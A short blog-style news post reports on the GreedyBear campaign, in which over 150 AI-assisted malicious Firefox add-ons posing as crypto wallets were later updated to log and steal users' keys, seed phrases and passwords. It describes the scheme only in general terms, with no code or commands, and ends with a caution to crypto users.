Mozilla Firefox Crypto Breach

An Artificial Intelligence (AI) hack has rocked the cryptocurrency sector as it has been hit with yet another high tech heist using AI.. With a combination of AI and malicious browser extensions and now a new generation of crypto hackers have emerged whom are being called GreedyBear. This group used AI generated Firefox add ons to steal over USD 1 million in digital assets from unsuspecting users.

Here's what's known so far

Security researchers from Koi Security uncovered the elaborate GreedyBear firefox campaign which so far has seen over 150 malicious extensions uploaded to the official Firefox add ons marketplace. These extensions were designed to impersonate popular cryptocurrency wallets with the main targets being MetaMask, Phantom, TronLink, Rabby Wallet and Exodus.

Using what is referred to as extension or process hollowing to bypass Mozilla’s safeguards by creating seemingly harmless wallet extensions, uploaded them for approval and got them listed.

They than posted fake positive reviews and ratings, making the extensions look legitimate to potential users. Once the extensions were trusted and installed by enough people, the attackers silently updated them with malicious code.

This malicious code acted as a keylogger and captured everything the victims typed into wallet forms including private keys, seed phrases and passwords. It also logged victims’ IP addresses and sent all this sensitive information to attacker controlled servers.

How AI Helped the Hackers

By utilising AI the hackers were able to roll out the coding faster than previously possible to more people at what is being referred to as an "industrial scale". The AI generated code further helped evade traditional security scans by creating more sophisticated and varied attack scripts. While also allowing the attackers to roll out dozens of variations quickly, making it harder for security teams to shut down the hack entirely.

Mozilla has since removed the malicious extensions the threat seems to be far from over. Researchers have identified a potential Chrome Web Store variant of the attack with a suspicious extension named Filecoin Wallet showing similar tactics.

Crypto users are being cautioned to check their recent downloads and take caution.

Please share this article so we can let more people know!

image sources provided supplemented by Canva Pro Subscription. This is not financial advice and readers are advised to undertake their own research or seek professional financial services

Posted Using INLEO